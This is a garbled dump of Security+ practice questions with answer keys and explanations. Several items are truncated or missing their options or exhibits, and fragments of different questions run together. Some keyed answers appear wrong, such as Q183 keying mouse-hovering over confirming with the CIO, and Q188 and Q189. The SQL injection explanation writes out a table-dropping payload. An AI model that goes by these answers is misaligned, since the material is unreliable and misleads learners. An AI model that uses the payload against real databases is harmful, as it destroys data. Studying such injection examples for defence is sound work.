183.A help desk technician receives an email from the Chief Information Officer (CIO) asking for
documents. The technician knows the CIO is on vacation for a few weeks.
Which of the following should the technician do to validate the authenticity of the email?
A. Check the metadata in the email header of the received path in reverse order to follow the email’s
path.
B. Hover the mouse over the CIO's email address to verify the email address.
C. Look at the metadata in the email header and verify the "From." line matches the CIO's email
address.
D. Forward the email to the CIO and ask if the CIO sent the email requesting the documents.
Answer: B
Explanation:
The “From” line in the email header can be easily spoofed or manipulated by an attacker to make it look
like the email is coming from the CIO’s email address. However, this does not mean that the email
address is actually valid or that the email is actually sent by the CIO. A better way to check the email
address is to hover over it and see if it matches the CIO’s email address exactly. This can help to spot
any discrepancies or typos that might indicate a phishing attempt. For example, if the CIO’s email
address is [email protected], but when you hover over it, it shows [email protected], then you know
that the email is not authentic and likely a phishing attempt.
185.Which of the following environments utilizes dummy data and is MOST likely to be installed locally
on a system that allows code to be assessed directly and modified easily with each build?
A. Production
B. Test
C. Staging
D. Development
Answer: D
Explanation:
A development environment is the environment that is used to develop and test software. It is typically
installed locally on a system that allows code to be assessed directly and modified easily with each build.
In this environment, dummy data is often utilized to test the software's functionality.
Reference: CompTIA Security+ Study Guide, Exam SY0-601, Chapter 3: Architecture and Design
186.An information security manager for an organization is completing a PCI DSS self-assessment for
the first time.
Which of the following is the MOST likely reason for this type of assessment?
187.Which of the following environments would MOST likely be used to assess the execution of
component parts of a system at both the hardware and software levels and to measure performance
characteristics?
A. Test
B. Staging
C. Development
D. Production
Answer: A
Explanation:
The test environment is used to assess the execution of component parts of a system at both the
hardware and software levels and to measure performance characteristics.
References: CompTIA Security+ Study Guide 601, Chapter 2
188.A Chief Information Officer receives an email stating a database will be encrypted within 24 hours
unless a payment of $20,000 is credited to the account mentioned In the email.
This BEST describes a scenario related to:
A. whaling.
B. smishing.
C. spear phishing
D. vishing
Answer: C
Explanation:
The scenario of receiving an email stating a database will be encrypted unless a payment is made is an
example of spear phishing.
References: CompTIA Security+ Study Guide by Emmett Dulaney, Chapter 2: Threats, Attacks, and
Vulnerabilities, Social Engineering
189.Sales team members have been receiving threatening voicemail messages and have reported these
incidents to the IT security team.
Which of the following would be MOST appropriate for the IT security team to analyze?
A. Access control
B. Syslog
C. Session Initiation Protocol traffic logs
D. Application logs
Answer: B
Explanation:
Syslogs are log files that are generated by devices on the network and contain information about
network activity, including user logins, device connections, and other events. By analyzing these logs,
the IT security team can identify the source of the threatening voicemail messages and take the
necessary steps to address the issue.
190.Which of the following security controls can be used to prevent multiple people from using a unique
card swipe and being admitted to an entrance?
A. Visitor logs
B. Faraday cages
C. Access control vestibules
D. Motion detection sensors
Answer: C
Explanation:
Access control vestibules are physical security controls that consist of two sets of doors or gates that
create a small enclosed space between them. Only one door or gate can be opened at a time, and only
one person can enter or exit the vestibule at a time. Access control vestibules can prevent multiple
people from using a unique card swipe and being admitted to a secure entrance, as they require each
person to authenticate individually and prevent tailgating or piggybacking.
191.An organization recently released a zero-trust policy that will enforce who is able to remotely access
certain data. Authenticated users who access the data must have a need to know, depending on their
level of permissions.
Which of the following is the first step the organization should take when implementing the policy?
A. Determine a quality CASB solution.
B. Configure the DLP policies by user groups.
C. Implement agentless NAC on boundary devices.
D. Classify all data on the file servers.
Answer: D
Explanation:
Zero trust is a security strategy that assumes breach and verifies each request as though it originates
from an untrusted network. A zero trust policy is a set of "allow rules" that specify conditions for
accessing certain resources.
According to one source, the first step in implementing a zero trust policy is to identify and classify all
data and assets in the organization. This helps to determine the level of sensitivity and risk associated
with each resource and apply appropriate access controls. Classifying all data on the file servers is the
first step in implementing a zero trust policy because it helps to determine the level of sensitivity and risk
associated with each resource and apply appropriate access controls.
Reference: Zero Trust implementation guidance | Microsoft Learn
192.Which of the following should be addressed first on security devices before connecting to the
network?
A. Open permissions
B. Default settings
C. API integration configuration
D. Weak encryption
Answer: B
Explanation:
Before connecting security devices to the network, it is crucial to address default settings first.
Manufacturers often ship devices with default settings that include default usernames, passwords, and
configurations. These settings are widely known and can be easily exploited by attackers. Changing
default settings helps to secure the device and prevent unauthorized access.
Reference: CompTIA Security+ SY0-501 Exam Objectives, Section 3.2: "Given a scenario, implement
secure systems design." (https://www.comptia.jp/pdf/Security%2B%20SY0-501%20Exam%20Objectives.pdf)
193.A financial institution recently joined a bug bounty program to identify security issues in the
institution's new public platform.
Which of the following best describes who the institution is working with to identify security issues?
A. Script kiddie
B. Insider threats
C. Malicious actor
D. Authorized hacker
Answer: D
Explanation:
An authorized hacker, also known as an ethical hacker or a white hat hacker, is someone who uses their
skills and knowledge to find and report security issues in a system or application with the permission of
the owner. An authorized hacker follows the rules and guidelines of the bug bounty program and does
not cause any harm or damage to the system or its users.
194.An organization recently released a software assurance policy that requires developers to run code
scans each night on the repository. After the first night, the security team alerted the developers that
more than 2,000 findings were reported and need to be addressed.
Which of the following is the MOST likely cause for the high number of findings?
A. The vulnerability scanner was not properly configured and generated a high number of false positives
B. Third-party libraries have been loaded into the repository and should be removed from the codebase.
C. The vulnerability scanner found several memory leaks during runtime, causing duplicate reports for
the same issue.
D. The vulnerability scanner was not loaded with the correct benchmarks and needs to be updated.
Answer: A
Explanation:
The most likely cause for the high number of findings is that the vulnerability scanner was not properly
configured and generated a high number of false positives. False positive results occur when a
vulnerability scanner incorrectly identifies a non-vulnerable system or application as being vulnerable.
This can happen due to incorrect configuration, over-sensitive rule sets, or outdated scan databases.
https://www.professormesser.com/security-plus/sy0-601/sy0-601-video/sy0-601-comptia-security-plus-course/
195.A security engineer is concerned the strategy for detection on endpoints is too heavily dependent on
previously defined attacks. The engineer wants a tool that can monitor for changes to key files and
network traffic for the device.
Which of the following tools should the engineer select?
A. HIDS
B. AV
C. NGFW
D. DLP
Answer: A
Explanation:
The security engineer should select a Host Intrusion Detection System (HIDS) to address the concern.
HIDS monitors and analyzes the internals of a computing system, such as key files and network traffic,
for any suspicious activity. Unlike antivirus software (AV), which relies on known signatures of malware,
HIDS can detect anomalies, policy violations, and previously undefined attacks by monitoring system
behavior and the network traffic of the device.
References:
1. CompTIA Security+ Certification Exam Objectives (SY0-601):
https://www.comptia.jp/pdf/Security%2B%20SY0-601%20Exam%20Objectives.pdf
2. Scarfone, K., & Mell, P. (2007). Guide to Intrusion Detection and Prevention Systems (IDPS):
Recommendations of the National Institute of Standards and Technology. NIST Special Publication 800-
94. https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-94.pdf
196.A security analyst is investigating a report from a penetration test. During the penetration test,
consultants were able to download sensitive data from a back-end server. The back-end server was
exposing an API that should have only been available from the company's mobile application.
After reviewing the back-end server logs, the security analyst finds the following entries:
Which of the following is the most likely cause of the security control bypass?
A. IP address allow list
B. user-agent spoofing
C. WAF bypass
D. Referrer manipulation
Answer: B
Explanation:
User-agent spoofing is a technique that allows an attacker to modify the user-agent header of an HTTP
request to impersonate another browser or device. User-agent spoofing can be used to bypass
security controls that rely on user-agent filtering or validation. In this case, the attacker spoofed the
user-agent header to match the company’s mobile application, which was allowed to access the back-
end server’s API.
197.An organization wants to quickly assess how effectively the IT team hardened new laptops.
Which of the following would be the best solution to perform this assessment?
A. Install a SIEM tool and properly configure it to read the OS configuration files.
B. Load current baselines into the existing vulnerability scanner.
C. Maintain a risk register with each security control marked as compliant or non-compliant.
D. Manually review the secure configuration guide checklists.
Answer: B
Explanation:
A vulnerability scanner is a tool that can scan devices and systems for known vulnerabilities,
misconfigurations, and compliance issues. By loading the current baselines into the scanner, the
organization can compare the actual state of the new laptops with the desired state and identify any
deviations or weaknesses. This is a quick and automated way to assess the hardening of the new
laptops.
198.A police department is using the cloud to share information with city officials.
Which of the cloud models describes this scenario?
A. Hybrid
B. Private
C. Public
D. Community
Answer: D
Explanation:
A community cloud model describes a scenario where a cloud service is shared among multiple
organizations that have common goals, interests, or requirements. A community cloud can be hosted by
one of the organizations, a third-party provider, or a combination of both. A community cloud can offer
benefits such as cost savings, security, compliance, and collaboration. A police department using the
cloud to share information with city officials is an example of a community cloud model.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.ibm.com/cloud/learn/community-cloud
199.A company was recently breached. Part of the company's new cybersecurity strategy is to centralize
the logs from all security devices.
Which of the following components forwards the logs to a central source?
A. Log enrichment
B. Log queue
C. Log parser
D. Log collector
Answer: D
Explanation:
A log collector is a component that forwards the logs from all security devices to a central source. A log
collector can be a software tool or a hardware appliance that collects logs from various sources, such as
firewalls, routers, servers, applications, or endpoints. A log collector can also perform functions such as
log filtering, parsing, aggregation, normalization, and enrichment. A log collector can help centralize
logging by sending the collected logs to a central log server or a security information and event
management (SIEM) system for further analysis and correlation.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://geekflare.com/open-source-centralized-logging/
200.An attacker is using a method to hide data inside of benign files in order to exfiltrate confidential
data.
Which of the following is the attacker most likely using?
A. Base64 encoding
B. Steganography
C. Data encryption
D. Perfect forward secrecy
Answer: B
Explanation:
Steganography is a technique for hiding data inside of benign files such as images, audio, or video. This
can be used to exfiltrate confidential data without raising suspicion or detection.
References: How to Hide Files Inside Files [Images, Folder] - Raymond.CC Blog; How to Hide Data in a
Secret Text File Compartment - How-To Geek; How to Hide Data Within an Image - Medium
201.Which of the following allows access to remote computing resources, an operating system, and
centralized configuration and data?
A. Containers
B. Edge computing
C. Thin client
D. Infrastructure as a service
Answer: C
Explanation:
Thin clients are devices that have minimal hardware and software components and rely on a remote
server to provide access to computing resources, an operating system, and centralized configuration and
data. Thin clients can reduce the cost, complexity, and security risks of managing multiple devices.
you have), and a fingerprint scan (something you are) for authentication.
Reference: CompTIA Security+ Study Guide (SY0-601) 7th Edition by Emmett Dulaney, Chuck Easttom
Note: There could be other options as well that could satisfy the three-factor authentication requirements
as per the organization's security policies.
203.Which of the following procedures would be performed after the root cause of a security incident has
been identified to help avoid future incidents from occurring?
A. Walk-throughs
B. Lessons learned
C. Attack framework alignment
D. Containment
Answer: B
Explanation:
After the root cause of a security incident has been identified, it is important to take the time to analyze
what went wrong and how it could have been prevented. This process is known as “lessons learned” and
allows organizations to identify potential improvements to their security processes and protocols.
Lessons learned typically involve a review of the incident and the steps taken to address it, a review of
the security systems and procedures in place, and an
analysis of any potential changes that can be made to prevent similar incidents from occurring in the
future.
204.A security operations technician is searching the log named /var/messages for any events that were
associated with a workstation with the IP address 10.1.1.1.
Which of the following would provide this information?
A. cat /var/messages | grep 10.1.1.1
B. grep 10.1.1.1 | cat /var/messages
C. grep /var/messages | cat 10.1.1.1
D. cat 10.1.1.1 | grep /var/messages
Answer: A
Explanation:
The cat command reads the file and streams its content to standard output. The | symbol connects the
output of the left command with the input of the right command. The grep command returns all lines that
match the regex. The cut command splits each line into fields based on a delimiter and extracts a
specific field.
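The explanation above describes what cat, | and grep do in answer A. The following Python is an added example, not part of the dump: it reproduces the selection `cat /var/messages | grep 10.1.1.1` makes over a few constructed syslog-style lines (hypothetical hosts and addresses) and shows two things the one-liner hides. Unescaped dots in the pattern match any character, and grep matches substrings, so 10.1.1.10, 110.1.1.1 and even a token like 10a1b1c1 are also returned. The last function restricts hits to lines where the address stands alone.

```python
import re

# Constructed sample lines standing in for /var/messages (hypothetical hosts and addresses).
SAMPLE_LOG = """\
Mar  1 10:00:01 gw sshd[1201]: Accepted password for alice from 10.1.1.1 port 51022 ssh2
Mar  1 10:00:05 gw sshd[1203]: Failed password for root from 10.1.1.10 port 40010 ssh2
Mar  1 10:00:09 gw kernel: DROP IN=eth0 SRC=110.1.1.1 DST=10.0.0.5
Mar  1 10:00:12 gw dhcpd: DHCPACK on 10.1.1.1 to 00:11:22:33:44:55 via eth1
Mar  1 10:00:15 gw sshd[1210]: Accepted password for bob from 10.1.1.2 port 51023 ssh2
Mar  1 10:00:20 gw app[77]: session 10a1b1c1 opened for carol
"""


def grep_like(lines, pattern):
    """Same selection as `cat file | grep PATTERN`: a line is kept if the regex matches anywhere.
    Unescaped dots in 10.1.1.1 match any character, so '10a1b1c1' is also returned."""
    rx = re.compile(pattern)
    return [ln for ln in lines if rx.search(ln)]


def grep_literal(lines, text):
    """Equivalent of grep -F: the text is matched literally, but still as a substring,
    so 10.1.1.10 and 110.1.1.1 are still returned when searching for 10.1.1.1."""
    return [ln for ln in lines if text in ln]


def grep_ip(lines, ip):
    """Only lines where the address stands alone: not preceded or followed by a digit or a dot."""
    rx = re.compile(r"(?<![\d.])" + re.escape(ip) + r"(?![\d.])")
    return [ln for ln in lines if rx.search(ln)]


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    for name, hits in (("grep 10.1.1.1", grep_like(lines, "10.1.1.1")),
                       ("grep -F 10.1.1.1", grep_literal(lines, "10.1.1.1")),
                       ("exact address", grep_ip(lines, "10.1.1.1"))):
        print(f"{name}: {len(hits)} line(s)")
        for ln in hits:
            print("   ", ln)
```

On the shell, the equivalent of grep_ip for this input is `grep -F -w 10.1.1.1 /var/messages`: -F makes the dots literal and -w requires the match to be bounded by non-word characters, so neither the wildcard matches nor the longer addresses are returned.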
205.Which of the following processes would most likely help an organization that has conducted an
incident response exercise to improve performance and identify challenges?
A. Lessons learned
B. Identification
C. Simulation
D. Containment
Answer: A
Explanation:
Lessons learned is a process that would most likely help an organization that has conducted an incident
response exercise to improve performance and identify challenges. Lessons learned is a process that
involves reviewing and evaluating the incident response exercise to identify what went well, what went
wrong, and what can be improved. Lessons learned can help an organization enhance its incident
response capabilities, address any gaps or weaknesses, and update its incident response plan
accordingly.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.sans.org/reading-room/whitepapers/incident/incident-handlers-handbook-33901
206.A company is switching to a remote work model for all employees. All company and employee
resources will be in the cloud. Employees must use their personal computers to access the cloud
computing environment. The company will manage the operating system.
Which of the following deployment models is the company implementing?
A. CYOD
B. MDM
C. COPE
D. VDI
Answer: D
Explanation:
According to Professor Messer’s video, VDI stands for Virtual Desktop Infrastructure and it is a
deployment model where employees use their personal computers to access a virtual machine that runs
the company’s operating system and applications.
In the scenario described, the company is implementing a virtual desktop infrastructure (VDI)
deployment model [1]. This allows employees to access the cloud computing environment using their
personal computers, while the company manages the operating system. The VDI model is suitable for
remote work scenarios because it provides secure and centralized desktop management, while allowing
employees to access desktops from any device.
207.A Chief Information Security Officer (CISO) is evaluating the dangers involved in deploying a new
ERP system for the company. The CISO categorizes the system, selects the controls that apply to the
system, implements the controls, and then assesses the success of the controls before authorizing the
system.
Which of the following is the CISO using to evaluate the environment for this new ERP system?
A. The Diamond Model of Intrusion Analysis
B. CIS Critical Security Controls
C. NIST Risk Management Framework
D. ISO 27002
Answer: C
Explanation:
The NIST Risk Management Framework (RMF) is a process for evaluating the security of a system and
implementing controls to reduce potential risks associated with it. The RMF process involves
categorizing the system, selecting the controls that apply to the system, implementing the controls, and
then assessing the success of the controls before authorizing the system. For more information on the
NIST Risk Management Framework and other security processes, refer to the CompTIA Security+ SY0-
601 Official Text Book and Resources.
208.A company would like to protect credit card information that is stored in a database from being
exposed and reused. However, the current POS system does not support encryption.
Which of the following would be BEST suited to secure this information?
A. Masking
B. Tokenization
C. DLP
D. SSL/TLS
Answer: B
Explanation:
Tokenization replaces sensitive data with non-sensitive data, such as a unique identifier. This means that
the data is still present in the system, but the sensitive information itself is replaced with the token.
Tokenization is more secure than masking, which only obscures the data but does not eliminate it. DLP is
not suitable for this task, as it is designed to prevent the loss or leakage of data from the system.
SSL/TLS can be used to secure the transmission of data, but it cannot prevent the data itself from being
exposed or reused. For more information, please refer to CompTIA Security+ SY0-601 Exam Objectives,
Section 3.3: Explain the security purpose of authentication, authorization and accounting (AAA) services,
and Section 4.7: Explain the purpose and characteristics of various types of encryption.
209.Multiple beaconing activities to a malicious domain have been observed. The malicious domain is
hosting malware from various endpoints on the network.
Which of the following technologies would be best to correlate the activities between the different
endpoints?
A. Firewall
B. SIEM
C. IPS
D. Protocol analyzer
Answer: B
Explanation:
SIEM stands for Security Information and Event Management, which is a technology that collects,
analyzes, and correlates data from multiple sources, such as firewall logs, IDS/IPS alerts, network
devices, applications, and endpoints. SIEM provides real-time monitoring and alerting of security events,
as well as historical analysis and reporting for compliance and forensic purposes.
A SIEM technology would be best to correlate the activities between the different endpoints that are
beaconing to a malicious domain. A SIEM can detect the malicious domain by comparing it with threat
intelligence feeds or known indicators of compromise (IOCs). A SIEM can also identify the endpoints that
are communicating with the malicious domain by analyzing the firewall logs and other network traffic
data. A SIEM can alert the security team of the potential compromise and provide them with relevant
information for investigation and remediation.
A security analyst reviews web server logs and notices the following line:
104.35. 45.53 -
210.Which of the following best describes when an organization utilizes a ready-to-use application from a
cloud provider?
A. IaaS
B. SaaS
C. PaaS
D. XaaS
Answer: B
Explanation:
SaaS stands for software as a service, which is a cloud computing model that provides ready-to-use
applications over the internet. SaaS applications are hosted and managed by a cloud provider who also
handles software updates, maintenance, security, and scalability. SaaS users can access the
applications through a web browser or a mobile app without installing any software on their devices.
SaaS applications are typically offered on a subscription or pay-per-use basis. Examples of SaaS
applications include email services, online office suites, customer relationship management (CRM)
systems, and video conferencing platforms.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.ibm.com/cloud/learn/software-as-a-service
211.A security analyst is using OSINT to gather information to verify whether company data is available
publicly.
Which of the following is the BEST application for the analyst to use?
A. theHarvester
B. Cuckoo
C. Nmap
D. Nessus
Answer: A
Explanation:
The Harvester is a reconnaissance tool that is used to gather information about a target organization,
such as email addresses, subdomains, and IP addresses. It can also be used to gather information
about a target individual, such as email addresses, phone numbers, and social media profiles. The
Harvester is specifically designed for OSINT (Open-Source Intelligence) and it can be used to discover
publicly available information about a target organization or individual.
D. SDV
Answer: C
Explanation:
SDN stands for software-defined networking, which is an approach to networking that uses software-
based controllers or application programming interfaces (APIs) to communicate with underlying
hardware infrastructure and direct traffic on a network. SDN decouples the network control plane from
the data plane, enabling centralized management and programmability of network resources. SDN can
help an engineer use scripting to deploy a network in a cloud environment by allowing them to define
and automate network policies, configurations, and services through software commands.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.cisco.com/c/en/us/solutions/software-defined-networking/overview.html
213.A security team is engaging a third-party vendor to do a penetration test of a new proprietary
application prior to its release.
Which of the following documents would the third-party vendor most likely be required to review and
sign?
A. SLA
B. NDA
C. MOU
D. AUP
Answer: B
Explanation:
NDA stands for Non-Disclosure Agreement, which is a legal contract that binds the parties to keep
confidential information secret and not to disclose it to unauthorized parties. A third-party vendor who is
doing a penetration test of a new proprietary application would most likely be required to review and sign
an NDA to protect the intellectual property and trade secrets of the security team.
214.A Chief Information Security Officer (CISO) wants to implement a new solution that can protect
against certain categories of websites, whether the employee is in the office or away.
Which of the following solutions should the CISO implement?
A. WAF
B. SWG
C. VPN
D. WDS
Answer: B
Explanation:
A secure web gateway (SWG) is a solution that can filter and block malicious or inappropriate web traffic
based on predefined policies. It can protect users from web-based threats, such as malware, phishing, or
ransomware, whether they are in the office or away. An SWG can be deployed as a hardware appliance,
a software application, or a cloud service.
References: https://www.comptia.org/content/guides/what-is-a-secure-web-gateway
215.The new Chief Information Security Officer at a company has asked the security team to implement
stronger user account policies.
The new policies require:
• Users to choose a password unique to their last ten passwords
• Users to not log in from certain high-risk countries
Which of the following should the security team implement? (Select two).
A. Password complexity
B. Password history
C. Geolocation
D. Geospatial
E. Geotagging
F. Password reuse
Answer: B,C
Explanation:
Password history is a policy that prevents users from reusing their previous passwords. This can reduce
the risk of password cracking or compromise. Geolocation is a policy that restricts users from logging in
from certain locations based on their IP address. This can prevent unauthorized access from high-risk
countries or regions.
References: https://www.comptia.org/content/guides/what-is-identity-and-access-management
216.While reviewing the /etc/shadow file, a security administrator notices files with the same values.
Which of the following attacks should the administrator be concerned about?
A. Plaintext
B. Birthday
C. Brute-force
D. Rainbow table
Answer: D
Explanation:
Rainbow table is a type of attack that should concern a security administrator when reviewing the
/etc/shadow file. The /etc/shadow file is a file that stores encrypted passwords of users in a Linux
system. A rainbow table is a precomputed table of hashes and their corresponding plaintext values that
can be used to crack hashed passwords. If an attacker obtains a copy of the /etc/shadow file, they can
use a rainbow table to find the plaintext passwords of users.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.geeksforgeeks.org/rainbow-table-in-cryptography/
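The explanation above says that identical values in /etc/shadow are what make a precomputed table useful: without a salt, every account with the same password stores the same hash. The Python below is an added example, not part of the dump. It builds shadow-style lines for hypothetical accounts (the $6$ fields are placeholders and the sample password is constructed), flags accounts that share a hash field, which is the check an administrator can run as a detection, and shows that salted hashing (PBKDF2-HMAC-SHA256 from the standard library) gives the same password a different value every time, so no such duplicates appear and a precomputed table has nothing to look up.

```python
import hashlib
import os


def unsalted_hash(password):
    """Plain SHA-256 of the password: the same input always gives the same digest."""
    return hashlib.sha256(password.encode()).hexdigest()


def salted_hash(password, salt=None):
    """PBKDF2-HMAC-SHA256 with a random 16-byte salt; returns (salt_hex, digest_hex).
    A fixed salt may be passed to verify a stored hash."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return salt.hex(), digest.hex()


# Constructed shadow-style lines (hypothetical accounts, not from the original dump).
# alice and bob were given the same constructed password and hashed without a salt,
# so the second field repeats. root and carol carry placeholder $6$ (SHA-512 crypt) fields.
_DUP = unsalted_hash("Winter2024!")
SAMPLE_SHADOW = (
    "root:$6$saltA$hashA:19700:0:99999:7:::\n"
    f"alice:{_DUP}:19700:0:99999:7:::\n"
    f"bob:{_DUP}:19700:0:99999:7:::\n"
    "carol:$6$saltB$hashB:19700:0:99999:7:::\n"
    "daemon:*:19700:0:99999:7:::\n"
)


def parse_shadow(text):
    """Return (username, password_field) pairs; shadow fields are colon separated."""
    pairs = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        pairs.append((fields[0], fields[1]))
    return pairs


def find_shared_hashes(text):
    """Map each password hash used by more than one account to the accounts sharing it.
    Locked or empty fields ('', '*', anything starting with '!') are not hashes and are skipped."""
    by_hash = {}
    for user, pwfield in parse_shadow(text):
        if pwfield in ("", "*") or pwfield.startswith("!"):
            continue
        by_hash.setdefault(pwfield, []).append(user)
    return {h: users for h, users in by_hash.items() if len(users) > 1}


def salted_hashes_differ(password):
    """Two salted hashes of the same password never share a value."""
    return salted_hash(password)[1] != salted_hash(password)[1]


if __name__ == "__main__":
    for h, users in find_shared_hashes(SAMPLE_SHADOW).items():
        print(f"accounts sharing hash {h[:16]}...: {', '.join(users)}")
    print("salted hashes of one password differ:", salted_hashes_differ("Winter2024!"))
```

Modern Linux systems already salt with crypt-style formats such as the $6$ entries above, which is why two real accounts with the same password normally show different fields; repeated values are therefore a signal worth investigating.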
217.A security administrator is compiling information from all devices on the local network in order to
gain better visibility into user activities.
Which of the following is the best solution to meet this objective?
A. SIEM
B. HIDS
C. CASB
D. EDR
Answer: A
Explanation:
SIEM stands for Security Information and Event Management, which is a solution that can collect,
correlate, and analyze security logs and events from various devices on a network. SIEM can provide
better visibility into user activities by generating reports, alerts, dashboards, and metrics. SIEM can also
help detect and respond to security incidents, comply with regulations, and improve security posture.
218.A security administrator installed a new web server. The administrator did this to increase the
capacity for an application due to resource exhaustion on another server.
Which of the following algorithms should the administrator use to split the number of connections on
each server in half?
A. Weighted response
B. Round-robin
C. Least connection
D. Weighted least connection
Answer: B
Explanation:
Round-robin is a type of load balancing algorithm that distributes traffic to a list of servers in rotation. It is
a static algorithm that does not take into account the state of the system for the distribution of tasks. It
assumes that all servers have equal capacity and can handle an equal amount of traffic.
219.While performing a threat-hunting exercise, a security analyst sees some unusual behavior
occurring in an application when a user changes the display name.
The security analyst decides to perform a static code analysis and receives the following pseudocode:
Which of the following attack types best describes the root cause of the unusual behavior?
A. Server-side request forgery
B. Improper error handling
C. Buffer overflow
D. SQL injection
Answer: D
Explanation:
SQL injection is one of the most common web hacking techniques. SQL injection is the placement of
malicious code in SQL statements, via web page input. A SQL injection attack consists of insertion or
“injection” of a SQL query via the input data from the client to the application. A successful SQL injection
exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute
administration operations on the database (such as shutdown the DBMS), recover the content of a given
file present on the DBMS file system and in some cases issue commands to the operating system.
According to the pseudocode given in the question, the application takes a user input for display name
and concatenates it with a SQL query to update the user’s profile. This is a vulnerable practice that
allows an attacker to inject malicious SQL code into the query and execute it on the database.
For example, an attacker could enter something like this as their display name:
John'; DROP TABLE users; --
This would result in the following SQL query being executed:
UPDATE profile SET displayname = 'John'; DROP TABLE users; --' WHERE userid = 1;
The semicolon (;) terminates the original update statement and starts a new one that drops the users
table. The double dash (--) comments out the rest of the query. This would cause a catastrophic loss of
data for the application.
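The explanation walks through the display-name payload by hand. The Python below is an added example, not the dump's own code: it runs the same concatenated UPDATE against an in-memory SQLite database (constructed users and profile tables) and then the parameterised form that fixes it. sqlite3's execute() refuses stacked statements, so the vulnerable function uses executescript() to stand in for a database driver that allows them, which is the condition the explanation assumes.

```python
import sqlite3


def make_db():
    """Constructed in-memory database with the two tables the explanation mentions."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users(userid INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE profile(userid INTEGER PRIMARY KEY, displayname TEXT);
        INSERT INTO users VALUES (1, 'john');
        INSERT INTO profile VALUES (1, 'John');
    """)
    return con


def update_display_name_vulnerable(con, userid, displayname):
    """Same shape as the pseudocode described in the question: input concatenated into SQL.
    executescript() runs every statement in the string, like a driver that permits stacked queries."""
    sql = ("UPDATE profile SET displayname = '" + displayname
           + "' WHERE userid = " + str(userid) + ";")
    con.executescript(sql)


def update_display_name_safe(con, userid, displayname):
    """Parameterised query: the driver binds the value, so it is never parsed as SQL."""
    con.execute("UPDATE profile SET displayname = ? WHERE userid = ?", (displayname, userid))
    con.commit()


def table_exists(con, name):
    row = con.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?", (name,)
    ).fetchone()
    return row is not None


def display_name(con, userid):
    row = con.execute("SELECT displayname FROM profile WHERE userid = ?", (userid,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    payload = "John'; DROP TABLE users; --"   # the display name from the explanation

    con = make_db()
    update_display_name_vulnerable(con, 1, payload)
    print("vulnerable: users table still exists?", table_exists(con, "users"))
    print("vulnerable: stored display name:", display_name(con, 1))

    con = make_db()
    update_display_name_safe(con, 1, payload)
    print("safe: users table still exists?", table_exists(con, "users"))
    print("safe: stored display name:", display_name(con, 1))
```

With the concatenated form the users table is gone and the profile row reads just "John"; with the bound parameter the whole string, quote and all, is stored as an ordinary display name and nothing else runs.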
220.A network engineer receives a call regarding multiple LAN-connected devices that are on the same
switch. The devices have suddenly been experiencing speed and latency issues while connecting to
network resources. The engineer enters the command show mac address-table and reviews the
following output:
Which of the following best describes the attack that is currently in progress?
A. MAC flooding
B. Evil twin
C. ARP poisoning
D. DHCP spoofing
Answer: C
Explanation:
This is an attempt to redirect traffic to an attacking host by sending an ARP packet that contains the
forged address of the next hop router. The attacker tricks the victim into believing that it is the legitimate
router by sending a spoofed ARP reply with its own MAC address. This causes the victim to send all its
traffic to the attacker instead of the router. The attacker can then intercept, modify, or drop the packets as
they please.
222.A security architect is designing the new outbound internet for a small company. The company would
like all 50 users to share the same single Internet connection. In addition, users will not be permitted to
223.An organization has been experiencing outages during holiday sales and needs to ensure
availability of its point-of-sales systems. The IT administrator has been asked to improve both server-
data fault tolerance and site availability under high consumer load.
Which of the following are the best options to accomplish this objective? (Select two.)
A. Load balancing
B. Incremental backups
C. UPS
D. RAID
E. Dual power supply
F. VLAN
Answer: A,D
Explanation:
Load balancing and RAID are the best options to accomplish the objective of improving both server-data
fault tolerance and site availability under high consumer load. Load balancing is a method of distributing
network traffic across multiple servers to optimize performance, reliability, and scalability. Load balancing
can help improve site availability by preventing server overload, ensuring high uptime, and providing
redundancy and failover. RAID stands for redundant array of independent disks, which is a technology
that combines multiple physical disks into a logical unit to improve data storage performance, reliability,
and capacity. RAID can help improve server-data fault tolerance by providing data redundancy, backup,
and recovery.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.nginx.com/resources/glossary/load-balancing/ https://www.ibm.com/cloud/learn/raid
224.A systems engineer thinks a business system has been compromised and is being used to
exfiltrate data to a competitor. The engineer contacts the CSIRT. The CSIRT tells the engineer to
225.A major manufacturing company updated its internal infrastructure and just started to allow OAuth
applications to access corporate data. Data leakage is being reported.
Which of the following most likely caused the issue?
A. Privilege creep
B. Unmodified default
C. TLS
D. Improper patch management
Answer: A
Explanation:
Privilege creep is the gradual accumulation of access rights beyond what an individual needs to do his or
her job. In information technology, a privilege is an identified right that a particular end user has to a
particular system resource, such as a file folder or virtual machine. Privilege creep often occurs when an
employee changes job responsibilities within an organization and is granted new privileges. While
employees may need to retain their former privileges during a period of transition, those privileges are
rarely revoked and result in an unnecessary accumulation of access privileges. Privilege creep creates a
security risk by increasing the attack surface and exposing sensitive data or systems to unauthorized or
malicious users.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.techtarget.com/searchsecurity/definition/privilege-creep
226.A retail store has a business requirement to deploy a kiosk computer in an open area. The kiosk
computer's operating system has been hardened and tested. A security engineer is concerned that
someone could use removable media to install a rootkit. Which of the following should the security engineer
227.Which of the following incident response phases should the proper collection of the detected IoCs
